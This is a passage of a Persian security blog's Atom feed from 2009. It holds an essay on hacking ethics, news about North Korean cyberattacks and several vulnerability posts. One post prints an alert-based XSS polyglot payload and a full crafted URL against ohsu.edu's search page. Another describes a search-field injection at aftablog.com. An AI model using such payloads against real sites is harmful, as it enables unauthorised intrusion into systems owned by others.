nowrap; TEXT-ALIGN: left } .gac_e {  PADDING-RIGHT: 3px; PADDING-LEFT: 3px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; TEXT-ALIGN: right } .gac_d {  FONT-SIZE: 11px } .gac_h {  COLOR: green } .gac_j {  DISPLAY: block } .gac_l {  LINE-HEIGHT: 18px } .gac_x {  DISPLAY: block; LINE-HEIGHT: 16px } .gac_y {  FONT-SIZE: 13px } .gac_i {  COLOR: #666 } .gac_w IMG {  WIDTH: 40px; HEIGHT: 40px } .gac_w {  WIDTH: 1px } .gac_r {  COLOR: red } .gac_v {  PADDING-BOTTOM: 5px } &lt;/style&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-1514963483898355419?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/1514963483898355419/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2010/06/sql-injection.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/1514963483898355419'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/1514963483898355419'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2010/06/sql-injection.html' title='ابزار های لازم برای Sql injection'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-6737567977622938967</id><published>2009-07-30T11:56:00.006+04:30</published><updated>2009-07-31T17:55:32.153+04:30</updated><title type='text'>رابطه ی علوم هک با شیاطین</title><content type='html'>&lt;div dir="rtl" style="text-align: right;"&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(51, 51, 51);font-size:85%;" &gt;&lt;span&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(204, 0, 0); font-weight: bold;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;نگاهی به علوم هک از دیدگاه &lt;/span&gt;سکانار&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:130%;"&gt;&lt;/span&gt;&lt;div style="text-align: right;"&gt;  &lt;p class="MsoNormal"&gt;&lt;span dir="rtl"  lang="AR-SA" style="font-family:Tahoma;"&gt;&lt;span style="font-size:85%;"&gt;&lt;span style=""&gt;        &lt;/span&gt;&lt;span style="color: rgb(51, 102, 102);font-size:100%;" &gt;.... شیاطین ، نابودگر، پسرهای شیطالن و..... از القاب هکرهای مصرفی می باشد. علت اینکه این هکرها مصرفی خوانده می شوند این است که وابسته به دست آوردهای هکرهای سطح بالاتر می باشند. حیطه ی فعالیت این دسته عموما تخریب و کسب اطلاعات محرمانه به قصد سودجویی است و به علوم هک و امنیت صرفا مانند پدیده ای برای سرگرمی می نگرند ، بیشتر شبیه به یک بازی کامپیوتری تا یک علم .&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;span dir="rtl"  lang="AR-SA" style="font-family:Tahoma;"&gt;اما اصولا هک چنین چیزی نیست ؛ هک یک علم تخصصی وابسته به علوم شبکه است و در&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span dir="rtl"  lang="AR-SA" style="font-family:Tahoma;"&gt; ارتباطی تنگاتنگ با امنیت می باشد,به صورتی که این دو مقوله کاملا به هم متصل بوده و غیر قابل تجزیه است . کسی که ادعای دانش هک دارد ناگزیر باید امنیت را بشناسد تا بتواند بر آن غلبه کند و همچنین متخصص امنیت کسی است که بتواند با مقوله ی هک آشنا باشد تا شیوه های مقابله با آن را پیشنهاد کند .&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;span dir="rtl"  lang="AR-SA" style="font-family:Tahoma;"&gt;بنابراین اولین وابستگی علوم هک به اصول شبکه و امنیت شبکه می باشد. پس از آن مهمترین فاکتور، برنامه نویسی و آشنایی با دنیای کدهاست و ادعای هکرها بدون دانش برنامه نویسی ادعایی بی اساس است . البته مفهوم این جمله آن نیست که هکرها باید بر تمامی زبان های برنامه نویسی مسلط باشند اما با زبان های وابسته و پر کاربرد در علوم هک باید آشنایی کامل داشته باشند و فاکتور سوم قدرت تجزیه و تحلیل بالا و مهندسی مبانی فوق می باشد .&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;span dir="rtl"  lang="AR-SA" style="font-family:Tahoma;"&gt;اصولا جایگاه هک در آنجا مطرح است که امنیت حضورداشته باشد ،هکر با آنالیز امنیت و با به چالش کشیدن آن راه را برای اقدام متخصصین به منظور ارتقاء امنیت باز کند و این ارتقاء امنیت راه را برای اهداف سودجویانه و تخریب کارانه کاهش می دهد . بنابراین در اصل، علوم هک و امنیت, علومی است تخصصی و فوق تخصصی که هدف آن ارتقاء امنیت سیستم های رایانه ای و در حد والاتر شبکه های رایانه ای می باشد. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;span dir="rtl"  lang="AR-SA" style="font-family:Tahoma;"&gt;اکنون در حد تخصصی تر، هک و امنیت در کلیه ی بخش ها حضور دارند. به طور مثال هک وبسایت؛ خود مقوله ای تخصصیاست که خود آن به بخش های فوق تخصصی که شامل متدهای مختلف است تقسیم بندی می شود. حال هکران متخصص با شناسایی روزنه های امنیتی آن را بارز کرده تا را حل هایی برای بستن آن یافت شود، و در ینجا هممان شیاطین با استفاده از روش های ارائه شده توسط متخصصین اقدام به تخریب سوژه های ضعیف، به منظور خودنمایی می کنند.&lt;span style=""&gt;  &lt;/span&gt;این خودنمایی تا آنجایی پیش می رود که با استفاده از همین احساس قدرت، اقدام به انتشار مقالات و مطالب آموزشی می کنند که چون این مقالات و مطالب بر اساس مبانی علمی نیست و فقط جنبه ی عملی دارد، دارای ایراداتی فاحش و بیانی غیراستاندار می باشد.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;span dir="rtl"  lang="AR-SA" style="font-family:Tahoma;"&gt;اقدام به دیفیس ( تغییر شکل صفحات سایت) شاید جذاب ترین بخش هک برای هکرهای مصرفی است که با ثبت آن خود را رکورددار می کنند. و جالب اینجاست که هر کدام ازاین دیفیس ها بر اساس متد هایی است که متخصصین و محققین به ثبت رسانده اند .منتها حق ادعای آن برای شیاطین دنیای وب همیشه محفوظ است .&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;span dir="rtl"  lang="AR-SA" style="font-family:Tahoma;"&gt;&lt;span style=""&gt;       &lt;/span&gt;در این مطالب سعی گردید که دنیای هک را شفافتر بیان گردد تا بتوان گفت که شیاطین هک کجای این دنیا قرار دارند.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span dir="rtl"  lang="AR-SA" style="font-family:Tahoma;"&gt;&lt;span style="font-size:100%;"&gt;با تشکر – محمد جوانبخت&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: left;"&gt;                                                                                                                                              &lt;span style="color: rgb(0, 153, 0);"&gt; پاینده باد ایران&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;p class="MsoNormal"&gt;&lt;span dir="rtl"  lang="AR-SA" style="font-family:Tahoma;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-6737567977622938967?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/6737567977622938967/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2009/07/blog-post_30.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/6737567977622938967'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/6737567977622938967'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2009/07/blog-post_30.html' title='رابطه ی علوم هک با شیاطین'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-4345165555425041685</id><published>2009-07-15T17:38:00.006+04:30</published><updated>2009-07-15T18:14:25.308+04:30</updated><title type='text'>آسیب پذیری جدید  HTML code or XSS, ''</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;span style="color: rgb(204, 0, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;, ''&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div dir="rtl" style="text-align: right;"&gt;کدی متمایز دیروز پیدا کردم و به این صورت هستش :&lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div dir="ltr" style="text-align: left;"&gt; XSS search?q=&lt;span style="color: rgb(204, 0, 0);font-size:100%;" &gt;'' ,&lt;/span&gt; &lt;span style="color: rgb(102, 102, 0);"&gt;[HTML code or XSS]&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;یعنی بعد از وارد کردن کارکتر های , '' می تونید کد های XSS و یا HTML وارد کنید !&lt;br /&gt;این مورد مربوط به آرایه های سرچ می باشد .&lt;br /&gt;این آسیب پذیری متناسب با تاریخ پست در سایت www.aftablog.com در تگ سرچ قابل مشاهده است .&lt;br /&gt;&lt;br /&gt;مثال برای HTML :&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_HjC-UOu9N2Q/Sl3Zti9LGfI/AAAAAAAAAGM/E-7mIVKOLFk/s1600-h/1.gif"&gt;&lt;img style="cursor: pointer; width: 400px; height: 248px;" src="http://1.bp.blogspot.com/_HjC-UOu9N2Q/Sl3Zti9LGfI/AAAAAAAAAGM/E-7mIVKOLFk/s400/1.gif" alt="" id="BLOGGER_PHOTO_ID_5358678508141484530" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;نمونه کد  HTML را در input مورد نظر قرار دهید (این کد فقط یک مثال است)&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: right;"&gt;&lt;span style="font-size:100%;"&gt;مثال برای XSS :&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_HjC-UOu9N2Q/Sl3bAObp0LI/AAAAAAAAAGU/MlsykITiKJo/s1600-h/2.gif"&gt;&lt;img style="cursor: pointer; width: 359px; height: 16px;" src="http://1.bp.blogspot.com/_HjC-UOu9N2Q/Sl3bAObp0LI/AAAAAAAAAGU/MlsykITiKJo/s400/2.gif" alt="" id="BLOGGER_PHOTO_ID_5358679928561324210" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left; font-weight: bold; color: rgb(0, 153, 0);"&gt;&lt;span&gt;پاینده باد ایران&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-4345165555425041685?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/4345165555425041685/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2009/07/xss-searchq-html-code-or-xss-xss-html.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/4345165555425041685'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/4345165555425041685'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2009/07/xss-searchq-html-code-or-xss-xss-html.html' title='آسیب پذیری جدید  HTML code or XSS, &apos;&apos;'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_HjC-UOu9N2Q/Sl3Zti9LGfI/AAAAAAAAAGM/E-7mIVKOLFk/s72-c/1.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-3903688575032155974</id><published>2009-07-13T16:08:00.005+04:30</published><updated>2009-07-13T17:24:41.212+04:30</updated><title type='text'>خطر امنیتی در bahar-20.com</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;HTTP MS Unsafe ActiveX Obj Instantiation&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;دیروز در حین بازدید از وبسایت بهار بیست که در زمینه ی وبلاگ و وبسایت فعالیت میکنه با این پیغام از طرف NIS مواجه شدم !&lt;br /&gt;&lt;div dir="rtl" style="text-align: right;"&gt;این خطا مربوط به  ActiveX هستش که از طرف شرکت بزرگ  Symantecخطر ناک اعلام شده ...&lt;br /&gt;این آسیب پذیری مربوط به کلیه ی نسخه های Internet Explorer هست .&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_HjC-UOu9N2Q/SlsgLU8EOKI/AAAAAAAAAGE/TLYg5wSooaI/s1600-h/1.gif"&gt;&lt;img style="cursor: pointer; width: 400px; height: 250px;" src="http://3.bp.blogspot.com/_HjC-UOu9N2Q/SlsgLU8EOKI/AAAAAAAAAGE/TLYg5wSooaI/s400/1.gif" alt="" id="BLOGGER_PHOTO_ID_5357911560658630818" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a href="http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=21864"&gt;لینک سایت&lt;/a&gt;&lt;a href="http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=21864"&gt;symantec&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=21864"&gt;&lt;/a&gt;&lt;br /&gt;البته این مسئله  رو در تعداد زیادی وبلاگ دیدم که اغلب محتوای هک داشتند !&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left; color: rgb(0, 153, 0); font-weight: bold;"&gt;&lt;span&gt;پاینده باد ایران&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-3903688575032155974?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/3903688575032155974/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2009/07/bahar-20com.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/3903688575032155974'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/3903688575032155974'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2009/07/bahar-20com.html' title='خطر امنیتی در bahar-20.com'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_HjC-UOu9N2Q/SlsgLU8EOKI/AAAAAAAAAGE/TLYg5wSooaI/s72-c/1.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-4904447338587049614</id><published>2009-07-10T19:52:00.003+04:30</published><updated>2009-07-10T20:33:46.979+04:30</updated><title type='text'>کره ی شمالی،هک را نظامی و سیاسی کرد</title><content type='html'>یکی از مواردی که خیلی انتظارش می رفت رخ بده این بود که هک به عنوان ابزاری  سیاسی و نظامی مطرح بشه و ازش در حد وسیعی استفاده بشه ! اولین باری که این مسئله به طور جدی برای من مطرح شد وقتی بود که مشغول بازی Generals بودم در اون بازی ارتش چین سربازهایی رو داشت که نوت بوکشون رو در می آوردن و مشغول به هک کردن دشمن می شدن . از اون روز تا الان چند سالی می گذره که در حال حاضر این مسئله به یکی از مهمترین اخبار جهان مبدل شده که کره ی شمالی اقدام به هک کردن و کسب اطلاعات محرمانه از کره ی جنوبی و آمریکا کرده و کره ی جنوبی هم یک یگان جنگ سایبر رو می خواد به منظور دفاع راه اندازی کنه البته این مسئله مسئله ی جدیدی نیست پیگیری لینک های زیر می تونه نشون بده این عملیات سازماندهی شده بوده&lt;span style="font-size:85%;"&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div align="left"&gt;&lt;a href="http://www.iritn.com/?action=show&amp;type=news&amp;id=4578"&gt;&lt;span style="font-size:85%;"&gt;http://www.iritn.com/?action=show&amp;amp;type=news&amp;amp;id=4578&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.medianews.ir/fa/2008/10/15/korea.html"&gt;&lt;span style="font-size:85%;"&gt;http://www.medianews.ir/fa/2008/10/15/korea.html&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href="http://persianhack.com/show.aspx?id=1580"&gt;&lt;span style="font-size:85%;"&gt;http://persianhack.com/show.aspx?id=1580&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div align="left" dir="ltr"&gt;&lt;a href="http://iranictnews.ir/category/security/C_104751_____هشدار-کره-جنوبی-پس-از-حمله-سایبر.htm"&gt;&lt;span style="font-size:85%;"&gt;http://iranictnews.ir/category/security/C_1047...&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="right"&gt;البته قصد دارم مقاله ای رو در باب چگونگی این حملات تهیه کنم که در یکی از نشریات و یا در همین وبلاگ منتشرش خواهم کرد !&lt;br /&gt;&lt;br /&gt;&lt;div align="left"&gt;&lt;span&gt;پاینده باد ایران&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-4904447338587049614?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/4904447338587049614/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2009/07/blog-post_10.html#comment-form' title='1 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/4904447338587049614'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/4904447338587049614'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2009/07/blog-post_10.html' title='کره ی شمالی،هک را نظامی و سیاسی کرد'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-6449287234440786531</id><published>2009-07-10T19:16:00.007+04:30</published><updated>2009-07-13T12:42:52.662+04:30</updated><title type='text'>آسیب پذیری XSS : ohsu.edu</title><content type='html'>&lt;div dir="ltr" align="right"&gt;&lt;div align="center"&gt;&lt;strong&gt;&lt;span&gt;XSS : ohsu.edu&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;/div&gt;&lt;div dir="rtl" align="right"&gt;و باز هم ایکس اس اس  مانند قبلی(در صفحه سرچ)...&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div align="left"&gt;&lt;span&gt;Address:&lt;/span&gt;&lt;br /&gt;www.ohsu.edu&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div align="left"&gt;&lt;span&gt;Code: &lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div dir="ltr" align="left"&gt;&lt;div dir="ltr" align="left"&gt;;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&lt;br /&gt;";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;"&gt;'&gt;&lt;br /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;a href="http://www.ohsu.edu/searchresults/controller.jsp?Ntt=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&amp;amp;Ntk=All&amp;amp;sid=1225A6DAB2E4"&gt;LINK&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div align="left"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_HjC-UOu9N2Q/SldXy2TC3iI/AAAAAAAAAE0/Lfvza8zRWF4/s1600-h/1.gif"&gt;&lt;img src="http://3.bp.blogspot.com/_HjC-UOu9N2Q/SldXy2TC3iI/AAAAAAAAAE0/Lfvza8zRWF4/s400/1.gif" alt="" id="BLOGGER_PHOTO_ID_5356846812860964386" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_HjC-UOu9N2Q/Slrr5ftlsUI/AAAAAAAAAFk/GYgUx4mAGfU/s1600-h/qw.gif"&gt;&lt;img style="cursor: pointer; width: 400px; height: 241px;" src="http://3.bp.blogspot.com/_HjC-UOu9N2Q/Slrr5ftlsUI/AAAAAAAAAFk/GYgUx4mAGfU/s400/qw.gif" alt="" id="BLOGGER_PHOTO_ID_5357854079708410178" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/SldXySfBSbI/AAAAAAAAAEs/bUMOA9AnGis/s1600-h/2.gif"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div align="left"&gt;&lt;span&gt;پاینده باد ایران&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-6449287234440786531?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/6449287234440786531/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2009/07/xss-ohsuedu.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/6449287234440786531'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/6449287234440786531'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2009/07/xss-ohsuedu.html' title='آسیب پذیری XSS : ohsu.edu'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_HjC-UOu9N2Q/SldXy2TC3iI/AAAAAAAAAE0/Lfvza8zRWF4/s72-c/1.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-5994463154734630493</id><published>2009-07-08T16:55:00.002+04:30</published><updated>2009-07-08T17:17:27.869+04:30</updated><title type='text'>پرشین گیگ،خانه ای برای تو</title><content type='html'>پرشین گیگ یکی از قدیمی ترین سرویس دهندگان Host  در ایران هستش که به جرعت می شه گفت قویترین سرویس دهنده هم هست !&lt;br /&gt;پرشین گیگ یک سرویس حرفه ای و در عین حال ساده هستش که می تونه نیاز تمام کاربرهاشو تامین کنه  .&lt;br /&gt;مدت زیادی بود که پرشین گیگ قصد داشت سرویس وبسایتشو راه اندازی کنه که مدتی هست این سرویس راه اندازی شده جا داشت بابت زحمات تیم حرفه ای www.persiangig.com تشکر کنم&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div align="left"&gt;&lt;span&gt;&lt;span style="color:#009900;"&gt;پاینده باد ایران&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-5994463154734630493?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/5994463154734630493/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2009/07/blog-post_08.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/5994463154734630493'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/5994463154734630493'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2009/07/blog-post_08.html' title='پرشین گیگ،خانه ای برای تو'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-9126948356490022410</id><published>2009-07-07T16:53:00.008+04:30</published><updated>2009-07-14T16:23:48.009+04:30</updated><title type='text'>آسیب پذیری XSS : zyn.com</title><content type='html'>&lt;div align="center"&gt;&lt;strong&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;XSS : 